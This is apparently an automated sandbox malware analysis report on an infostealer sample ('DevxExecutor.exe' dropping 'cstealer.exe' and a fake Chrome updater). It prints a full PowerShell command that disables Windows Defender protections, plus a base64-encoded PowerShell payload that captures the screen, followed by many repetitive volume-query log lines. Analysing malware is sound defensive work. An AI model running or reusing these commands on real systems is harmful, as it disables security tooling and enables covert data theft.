guabqbiagwaaqblahmaia
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8a
bqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

                                Language, Device and Operating System Detection

                                Source: Yara match | File source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC6536F0 cpuid 3_2_00000271DC6536F0
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Queries volume information: C:\Users\user\Desktop\DevxExecutor.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\certifi VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_ctypes.pyd VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_lzma.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\libcrypto-1_1.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\libffi-8.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\sqlite3.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\VCRUNTIME140.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_socket.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_ssl.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_hashlib.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
